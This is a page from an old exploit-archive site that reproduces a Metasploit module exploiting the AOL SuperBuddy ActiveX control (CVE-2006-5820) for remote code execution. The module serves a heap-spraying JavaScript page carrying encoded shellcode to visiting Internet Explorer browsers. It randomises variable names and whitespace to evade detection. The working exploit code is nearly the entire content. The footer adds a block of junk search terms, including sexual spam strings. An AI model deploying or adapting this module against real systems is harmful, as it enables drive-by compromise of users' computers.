about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (meta)




2007-04-04 AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (meta) 
Rated as : Critical

require 'msf/core'

module Msf

class Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons <
Msf::Exploit::Remote

	include Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AOL Sb.Superbuddy vulnerability',
			'Description'    => %q{
				This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code
from a pre-existing metasploit module.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'kradchad',
					'leetpete'
				],
			'Version'        => '0.1',
			'References'     => 
				[
					[ 'CVE', 'CVE-2006-5820']
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "\x00",
	
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c}
]
				],
			'DefaultTarget'  => 0))
	end

	def autofilter
		false
	end
	
	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded,
Rex::Arch.endian(target.arch))
		
		# Get a unicode friendly version of the return address
		addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]

		# Randomize the javascript variable names	
		var_buffer    = rand_text_alpha(rand(30)+2)
		var_shellcode = rand_text_alpha(rand(30)+2)
		var_unescape  = rand_text_alpha(rand(30)+2)
		var_x         = rand_text_alpha(rand(30)+2)
		var_i         = rand_text_alpha(rand(30)+2)
		var_tic       = rand_text_alpha(rand(30)+2)
		var_toc       = rand_text_alpha(rand(30)+2)
		
		# Randomize HTML data
		html          = rand_text_alpha(rand(30)+2)
		
		# Build out the message
		content = %Q|
<html>
<head>
	<script>
	try {
	
	var #{var_unescape}  = unescape ;
	var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
	
	var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
	while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer}
;

	var #{var_x} = new Array() ;	
	for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) {
		#{var_x}[ #{var_i} ] = 		
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) +
#{var_shellcode} ;
	}
	
	
   	var #{var_tic} = new ActiveXObject( 'Sb.SuperBuddy.1' );	
	try { #{var_tic}.LinkSBIcons( #{target.ret} ) ; } catch( e ) { }

	
	} catch( e ) { window.location = 'about:blank' ; }
	
	</script>
</head>
<body>
#{html}
</body>
</html>		
		|

		# Randomize the whitespace in the document
		content.gsub!(/\s+/) do |s|
			len = rand(100)+2
			set = "\x09\x20\x0d\x0a"
			buf = ''
			
			while (buf.length < len)
				buf << set[rand(set.length)].chr
			end
			
			buf
		end
		
		print_status("Sending exploit to
#{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
	end

end

end

securitydot.net - 2007-04-04

Advertising

Copyright 2007, SecurityDot
Fri, 27 Nov 2009 15:10:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
upb ibm vBulletin sexyvided t835t vidsvidsvi news for C Www.jagran yingxiongd www.hupiao news searc Www.sexy s news for c /search/ex india.very Solaris 8. news searc sexyviedoe www.gools. www.zql.yn www.youtub shagelasex upb Sexygarl.c www.gaoava ac.gaoavav sharepoint ab.gaoavav Xxx video upb Horse pop up ad.gaoavav creedo shemal sex Sexymovies Sexual ind india sexy wwww.takta modifyform shishangyi sexy,vidos shjcwl.cn www.ywhpy. www.pc987. www.47oo.c 5901 utorrent components foto galer